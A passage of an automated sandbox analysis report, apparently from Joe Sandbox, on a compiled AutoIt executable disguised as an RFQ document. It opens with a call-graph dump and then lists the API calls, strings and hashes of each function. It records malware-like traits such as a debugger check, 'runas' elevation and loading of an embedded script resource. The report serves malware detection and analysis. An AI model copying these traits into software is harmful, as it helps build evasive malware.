ef8f6 101172->101173 101174 1003a2 6 API calls 101173->101174 101174->101137 101176 e77c7 59 API calls 101175->101176 101177 f60f7 101176->101177 101178 e77c7 59 API calls 101177->101178 101179 f60ff 101178->101179 101219 f5bfd 101179->101219 101182 f5bfd 59 API calls 101183 f610f 101182->101183 101184 e77c7 59 API calls 101183->101184 101185 f611a 101184->101185 101186 100ff6 Mailbox 59 API calls 101185->101186 101187 efa68 101186->101187 101188 f6259 101187->101188 101189 f6267 101188->101189 101190 e77c7 59 API calls 101189->101190 101191 f6272 101190->101191 101192 e77c7 59 API calls 101191->101192 101193 f627d 101192->101193 101194 e77c7 59 API calls 101193->101194 101195 f6288 101194->101195 101196 e77c7 59 API calls 101195->101196 101197 f6293 101196->101197 101198 f5bfd 59 API calls 101197->101198 101199 f629e 101198->101199 101200 100ff6 Mailbox 59 API calls 101199->101200 101201 f62a5 RegisterWindowMessageW 101200->101201 101201->101151 101204 135cc3 101203->101204 101205 fffee 101203->101205 101222 149d71 60 API calls 101204->101222 101207 100ff6 Mailbox 59 API calls 101205->101207 101209 ffff6 101207->101209 101208 135cce 101209->101155 101210->101162 101211->101164 101223 14748f 65 API calls 101211->101223 101213 e77c7 59 API calls 101212->101213 101214 100227 101213->101214 101215 e77c7 59 API calls 101214->101215 101216 10022f 101215->101216 101217 e77c7 59 API calls 101216->101217 101218 10017b 101217->101218 101218->101168 101220 e77c7 59 API calls 101219->101220 101221 f5c05 101220->101221 101221->101182 101222->101208 101224 e1055 101229 e2649 101224->101229 101227 102f80 __cinit 67 API calls 101228 e1064 101227->101228 101230 e77c7 59 API calls 101229->101230 101231 e26b7 101230->101231 101236 e3582 101231->101236 101234 e2754 101235 e105a 101234->101235 101239 e3416 59 API calls 2 library calls 101234->101239 101235->101227 101240 e35b0 101236->101240 101239->101234 101241 e35a1 101240->101241 101242 e35bd 101240->101242 101241->101234 101242->101241 101243 e35c4 RegOpenKeyExW 101242->101243 101243->101241 101244 e35de RegQueryValueExW 101243->101244 101245 e3614 RegCloseKey 101244->101245 101246 e35ff 101244->101246 101245->101241 101246->101245 101247 e3633 101248 e366a 101247->101248 101249 e3688 101248->101249 101250 e36e7 101248->101250 101251 e36e5 101248->101251 101252 e375d PostQuitMessage 101249->101252 101253 e3695 101249->101253 101255 e36ed 101250->101255 101256 11d31c 101250->101256 101254 e36ca DefWindowProcW 101251->101254 101260 e36d8 101252->101260 101257 11d38f 101253->101257 101258 e36a0 101253->101258 101254->101260 101261 e3715 SetTimer RegisterWindowMessageW 101255->101261 101262 e36f2 101255->101262 101297 f11d0 10 API calls Mailbox 101256->101297 101301 142a16 71 API calls _memset 101257->101301 101263 e36a8 101258->101263 101264 e3767 101258->101264 101261->101260 101265 e373e CreatePopupMenu 101261->101265 101268 e36f9 KillTimer 101262->101268 101269 11d2bf 101262->101269 101270 11d374 101263->101270 101271 e36b3 101263->101271 101295 e4531 64 API calls _memset 101264->101295 101265->101260 101267 11d343 101298 f11f3 341 API calls Mailbox 101267->101298 101292 e44cb Shell_NotifyIconW _memset 101268->101292 101275 11d2c4 101269->101275 101276 11d2f8 MoveWindow 101269->101276 101270->101254 101300 13817e 59 API calls Mailbox 101270->101300 101279 e36be 101271->101279 101280 e374b 101271->101280 101272 11d3a1 101272->101254 101272->101260 101282 11d2e7 SetFocus 101275->101282 101283 11d2c8 101275->101283 101276->101260 101278 e370c 101293 e3114 DeleteObject DestroyWindow Mailbox 101278->101293 101279->101254 101299 e44cb Shell_NotifyIconW _memset 101279->101299 101294 e45df 81 API calls _memset 101280->101294 101281 e375b 101281->101260 101282->101260 101283->101279 101287 11d2d1 101283->101287 101296 f11d0 10 API calls Mailbox 101287->101296 101290 11d368 101291 e43db 68 API calls 101290->101291 101291->101251 101292->101278 101293->101260 101294->101281 101295->101281 101296->101260 101297->101267 101298->101279 101299->101290 101300->101251 101301->101272 101302 ef23b0 101303 ef0000 GetPEB 101302->101303 101304 ef249c 101303->101304 101316 ef22a0 101304->101316 101317 ef22a9 Sleep 101316->101317 101318 ef22b7 101317->101318

                                              Executed Functions

                                              Function 000E3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000E3B7A
                                              • IsDebuggerPresent.KERNEL32 ref: 000E3B8C
                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,001A62F8,001A62E0,?,?), ref: 000E3BFD
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                                • Part of subcall function 000F0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,000E3C26,001A62F8,?,?,?), ref: 000F0ACE
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 000E3C81
                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,001993F0,00000010), ref: 0011D4BC
                                              • SetCurrentDirectoryW.KERNEL32(?,001A62F8,?,?,?), ref: 0011D4F4
                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00195D40,001A62F8,?,?,?), ref: 0011D57A
                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 0011D581
                                                • Part of subcall function 000E3A58: GetSysColorBrush.USER32(0000000F), ref: 000E3A62
                                                • Part of subcall function 000E3A58: LoadCursorW.USER32(00000000,00007F00), ref: 000E3A71
                                                • Part of subcall function 000E3A58: LoadIconW.USER32(00000063), ref: 000E3A88
                                                • Part of subcall function 000E3A58: LoadIconW.USER32(000000A4), ref: 000E3A9A
                                                • Part of subcall function 000E3A58: LoadIconW.USER32(000000A2), ref: 000E3AAC
                                                • Part of subcall function 000E3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000E3AD2
                                                • Part of subcall function 000E3A58: RegisterClassExW.USER32(?), ref: 000E3B28
                                                • Part of subcall function 000E39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000E3A15
                                                • Part of subcall function 000E39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000E3A36
                                                • Part of subcall function 000E39E7: ShowWindow.USER32(00000000,?,?), ref: 000E3A4A
                                                • Part of subcall function 000E39E7: ShowWindow.USER32(00000000,?,?), ref: 000E3A53
                                                • Part of subcall function 000E43DB: _memset.LIBCMT ref: 000E4401
                                                • Part of subcall function 000E43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000E44A6
                                              Strings
                                              • This is a third-party compiled AutoIt script., xrefs: 0011D4B4
                                              • runas, xrefs: 0011D575
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                              • String ID: This is a third-party compiled AutoIt script.$runas
                                              • API String ID: 529118366-3287110873
                                              • Opcode ID: 2c509f9c0257098d0dc9bdb29d0b5e259219ba7902a8b32b35047d8be08be247
                                              • Instruction ID: a5aea7fc4f65616202744e7434a894a81b68f64a32fc05ede61ae3e90b56a642
                                              • Opcode Fuzzy Hash: 2c509f9c0257098d0dc9bdb29d0b5e259219ba7902a8b32b35047d8be08be247
                                              • Instruction Fuzzy Hash: C951E671908288AECF11EBB5EC09AFD7F79AB05300B18417AF455B31A2DB749686CB21
                                              Function 000E4AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 996 e4afe-e4b5e call e77c7 GetVersionExW call e7d2c 1001 e4c69-e4c6b 996->1001 1002 e4b64 996->1002 1003 11db90-11db9c 1001->1003 1004 e4b67-e4b6c 1002->1004 1005 11db9d-11dba1 1003->1005 1006 e4b72 1004->1006 1007 e4c70-e4c71 1004->1007 1009 11dba3 1005->1009 1010 11dba4-11dbb0 1005->1010 1008 e4b73-e4baa call e7e8c call e7886 1006->1008 1007->1008 1018 11dc8d-11dc90 1008->1018 1019 e4bb0-e4bb1 1008->1019 1009->1010 1010->1005 1012 11dbb2-11dbb7 1010->1012 1012->1004 1014 11dbbd-11dbc4 1012->1014 1014->1003 1016 11dbc6 1014->1016 1020 11dbcb-11dbce 1016->1020 1021 11dc92 1018->1021 1022 11dca9-11dcad 1018->1022 1019->1020 1023 e4bb7-e4bc2 1019->1023 1024 11dbd4-11dbf2 1020->1024 1025 e4bf1-e4c08 GetCurrentProcess IsWow64Process 1020->1025 1026 11dc95 1021->1026 1030 11dc98-11dca1 1022->1030 1031 11dcaf-11dcb8 1022->1031 1027 11dc13-11dc19 1023->1027 1028 e4bc8-e4bca 1023->1028 1024->1025 1029 11dbf8-11dbfe 1024->1029 1032 e4c0d-e4c1e 1025->1032 1033 e4c0a 1025->1033 1026->1030 1038 11dc23-11dc29 1027->1038 1039 11dc1b-11dc1e 1027->1039 1034 e4bd0-e4bd3 1028->1034 1035 11dc2e-11dc3a 1028->1035 1036 11dc00-11dc03 1029->1036 1037 11dc08-11dc0e 1029->1037 1030->1022 1031->1026 1040 11dcba-11dcbd 1031->1040 1041 e4c89-e4c93 GetSystemInfo 1032->1041 1042 e4c20-e4c30 call e4c95 1032->1042 1033->1032 1043 e4bd9-e4be8 1034->1043 1044 11dc5a-11dc5d 1034->1044 1046 11dc44-11dc4a 1035->1046 1047 11dc3c-11dc3f 1035->1047 1036->1025 1037->1025 1038->1025 1039->1025 1040->1030 1045 e4c56-e4c66 1041->1045 1053 e4c7d-e4c87 GetSystemInfo 1042->1053 1054 e4c32-e4c3f call e4c95 1042->1054 1049 e4bee 1043->1049 1050 11dc4f-11dc55 1043->1050 1044->1025 1052 11dc63-11dc78 1044->1052 1046->1025 1047->1025 1049->1025 1050->1025 1055 11dc82-11dc88 1052->1055 1056 11dc7a-11dc7d 1052->1056 1057 e4c47-e4c4b 1053->1057 1061 e4c76-e4c7b 1054->1061 1062 e4c41-e4c45 GetNativeSystemInfo 1054->1062 1055->1025 1056->1025 1057->1045 1059 e4c4d-e4c50 FreeLibrary 1057->1059 1059->1045 1061->1062 1062->1057
                                              APIs
                                              • GetVersionExW.KERNEL32(?), ref: 000E4B2B
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                              • GetCurrentProcess.KERNEL32(?,0016FAEC,00000000,00000000,?), ref: 000E4BF8
                                              • IsWow64Process.KERNEL32(00000000), ref: 000E4BFF
                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 000E4C45
                                              • FreeLibrary.KERNEL32(00000000), ref: 000E4C50
                                              • GetSystemInfo.KERNEL32(00000000), ref: 000E4C81
                                              • GetSystemInfo.KERNEL32(00000000), ref: 000E4C8D
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                              • String ID:
                                              • API String ID: 1986165174-0
                                              • Opcode ID: a5ef6e887ff4b3df9b47420b41bab253d8dec1cdbf07bf2a7ebbf3dbb06ad4a9
                                              • Instruction ID: 9094b3b12be4b17329f21669800cca38af696d04264794916911d4cbb5468bf4
                                              • Opcode Fuzzy Hash: a5ef6e887ff4b3df9b47420b41bab253d8dec1cdbf07bf2a7ebbf3dbb06ad4a9
                                              • Instruction Fuzzy Hash: 6391E43154A7C0DEC735CB7998512AABFE4AF2A300B584DAED0CBA3A01D320F948C759
                                              Function 000E4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1063 e4fe9-e5001 CreateStreamOnHGlobal 1064 e5003-e501a FindResourceExW 1063->1064 1065 e5021-e5026 1063->1065 1066 11dd5c-11dd6b LoadResource 1064->1066 1067 e5020 1064->1067 1066->1067 1068 11dd71-11dd7f SizeofResource 1066->1068 1067->1065 1068->1067 1069 11dd85-11dd90 LockResource 1068->1069 1069->1067 1070 11dd96-11dd9e 1069->1070 1071 11dda2-11ddb4 1070->1071 1071->1067
                                              APIs
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000E4EEE,?,?,00000000,00000000), ref: 000E4FF9
                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000E4EEE,?,?,00000000,00000000), ref: 000E5010
                                              • LoadResource.KERNEL32(?,00000000,?,?,000E4EEE,?,?,00000000,00000000,?,?,?,?,?,?,000E4F8F), ref: 0011DD60
                                              • SizeofResource.KERNEL32(?,00000000,?,?,000E4EEE,?,?,00000000,00000000,?,?,?,?,?,?,000E4F8F), ref: 0011DD75
                                              • LockResource.KERNEL32(000E4EEE,?,?,000E4EEE,?,?,00000000,00000000,?,?,?,?,?,?,000E4F8F,00000000), ref: 0011DD88
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                              • String ID: SCRIPT
                                              • API String ID: 3051347437-3967369404
                                              • Opcode ID: 36e2f991422d6144c2febe48afd13f6fcb4ed4b259d5af4df03084816ba68e3a
                                              • Instruction ID: 1e94bac006fc20802870bfc6ac5b199a2f3cfc7abb79702b74a7448855abfba6
                                              • Opcode Fuzzy Hash: 36e2f991422d6144c2febe48afd13f6fcb4ed4b259d5af4df03084816ba68e3a
                                              • Instruction Fuzzy Hash: B4117C75200700BFD7218B66EC58F677BBDEBC9B16F20456CF406D66A0DBB1EC418A60
                                              Function 00144696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,0011E7C1), ref: 001446A6
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 001446B7
                                              • FindClose.KERNEL32(00000000), ref: 001446C7
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FileFind$AttributesCloseFirst
                                              • String ID:
                                              • API String ID: 48322524-0
                                              • Opcode ID: 1939814b3bbe6ca716074a72d66d1e7c7d909e067aa09dcd59e6be0b2512a9a7
                                              • Instruction ID: 941b9dca822fb9166f9735a1927df65f936370f7bb184e0f0120ef4a7a24060f
                                              • Opcode Fuzzy Hash: 1939814b3bbe6ca716074a72d66d1e7c7d909e067aa09dcd59e6be0b2512a9a7
                                              • Instruction Fuzzy Hash: 37E0D8318104005B42106738FC4D4EA775C9F06335F11071AF875C15F0E7F09991C999
                                              Function 000EE800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                              Download Yara Rule
                                              Strings
                                              • Variable must be of type 'Object'., xrefs: 0012428C
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Variable must be of type 'Object'.
                                              • API String ID: 0-109567571
                                              • Opcode ID: fd53553d987bef1810f44c4c5b8a7908c297e74197ddd2691e78df967b5ae099
                                              • Instruction ID: 2ae8e2bb9ea1531cc61affac28d5fb5b13a8a81ac643c02a422a426e634cedc4
                                              • Opcode Fuzzy Hash: fd53553d987bef1810f44c4c5b8a7908c297e74197ddd2691e78df967b5ae099
                                              • Instruction Fuzzy Hash: 60A27E74A04299CFCB24CF55D880AAEB7F1FF59300F248069E916AB351D775ED82CB91
                                              Function 000F0B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000F0BBB
                                              • timeGetTime.WINMM ref: 000F0E76
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000F0FB3
                                              • TranslateMessage.USER32(?), ref: 000F0FC7
                                              • DispatchMessageW.USER32(?), ref: 000F0FD5
                                              • Sleep.KERNEL32(0000000A), ref: 000F0FDF
                                              • LockWindowUpdate.USER32(00000000,?,?), ref: 000F105A
                                              • DestroyWindow.USER32 ref: 000F1066
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000F1080
                                              • Sleep.KERNEL32(0000000A,?,?), ref: 001252AD
                                              • TranslateMessage.USER32(?), ref: 0012608A
                                              • DispatchMessageW.USER32(?), ref: 00126098
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001260AC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                              • API String ID: 4003667617-3242690629
                                              • Opcode ID: c38b571317e4524b8f6e1c9de1157cd341402b1dac6f307cc2df11c1ad03e513
                                              • Instruction ID: a64a90af88873b00bc3233b5744d49719ee051e54667e50ceae2bf365191f56e
                                              • Opcode Fuzzy Hash: c38b571317e4524b8f6e1c9de1157cd341402b1dac6f307cc2df11c1ad03e513
                                              • Instruction Fuzzy Hash: E1B2F270608751DFD728DF24D884BAEBBE1BF84304F14491DF58A976A2DB70E894DB82
                                              Function 001493DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 001491E9: __time64.LIBCMT ref: 001491F3
                                                • Part of subcall function 000E5045: _fseek.LIBCMT ref: 000E505D
                                              • __wsplitpath.LIBCMT ref: 001494BE
                                                • Part of subcall function 0010432E: __wsplitpath_helper.LIBCMT ref: 0010436E
                                              • _wcscpy.LIBCMT ref: 001494D1
                                              • _wcscat.LIBCMT ref: 001494E4
                                              • __wsplitpath.LIBCMT ref: 00149509
                                              • _wcscat.LIBCMT ref: 0014951F
                                              • _wcscat.LIBCMT ref: 00149532
                                                • Part of subcall function 0014922F: _memmove.LIBCMT ref: 00149268
                                                • Part of subcall function 0014922F: _memmove.LIBCMT ref: 00149277
                                              • _wcscmp.LIBCMT ref: 00149479
                                                • Part of subcall function 001499BE: _wcscmp.LIBCMT ref: 00149AAE
                                                • Part of subcall function 001499BE: _wcscmp.LIBCMT ref: 00149AC1
                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 001496DC
                                              • _wcsncpy.LIBCMT ref: 0014974F
                                              • DeleteFileW.KERNEL32(?,?), ref: 00149785
                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0014979B
                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001497AC
                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001497BE
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                              • String ID:
                                              • API String ID: 1500180987-0
                                              • Opcode ID: b828fe8e49c23ff3256dd1aa08b5662cba7f84abdba65660857c3549b0f5ead0
                                              • Instruction ID: 557bc122d8136215b73397460756a66d6bbbfafa189ce240a0f286afda2b570c
                                              • Opcode Fuzzy Hash: b828fe8e49c23ff3256dd1aa08b5662cba7f84abdba65660857c3549b0f5ead0
                                              • Instruction Fuzzy Hash: 96C128B1D00229AEDF21DFA5CC85ADFB7BDAF54314F0040AAF609E6151EB709A848F65
                                              Function 000E3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 000E3074
                                              • RegisterClassExW.USER32(00000030), ref: 000E309E
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000E30AF
                                              • InitCommonControlsEx.COMCTL32(?), ref: 000E30CC
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000E30DC
                                              • LoadIconW.USER32(000000A9), ref: 000E30F2
                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000E3101
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 2914291525-1005189915
                                              • Opcode ID: 4c4112f80bf4c01487826a4e5cbb69ce9c2c010f995a5e7e0389d976066e171f
                                              • Instruction ID: cb6b460cf4d653d6b8322da3a69ecd019d01d64d63da41668375f07d143fd30c
                                              • Opcode Fuzzy Hash: 4c4112f80bf4c01487826a4e5cbb69ce9c2c010f995a5e7e0389d976066e171f
                                              • Instruction Fuzzy Hash: C0315871845309EFDB01DFA4EC85AC9BBF4FB0A320F18456EE590E66A0D3B90982CF50
                                              Function 000E3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 000E3074
                                              • RegisterClassExW.USER32(00000030), ref: 000E309E
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000E30AF
                                              • InitCommonControlsEx.COMCTL32(?), ref: 000E30CC
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000E30DC
                                              • LoadIconW.USER32(000000A9), ref: 000E30F2
                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000E3101
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 2914291525-1005189915
                                              • Opcode ID: 47fa82ff475cfe39f62197ea9e7b253ecff736babe6bbfd9de429980df5d94a8
                                              • Instruction ID: 25a32b5f1a891701fe5222505c1fa4b61f2ad070f00055e26f0277ac79c694ea
                                              • Opcode Fuzzy Hash: 47fa82ff475cfe39f62197ea9e7b253ecff736babe6bbfd9de429980df5d94a8
                                              • Instruction Fuzzy Hash: 3E21C2B5901318AFDB00DFA4ED89BDDBBF8FB09710F04812AFA10A66A0D7B545858F91
                                              Function 000E71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                              Download Yara Rule

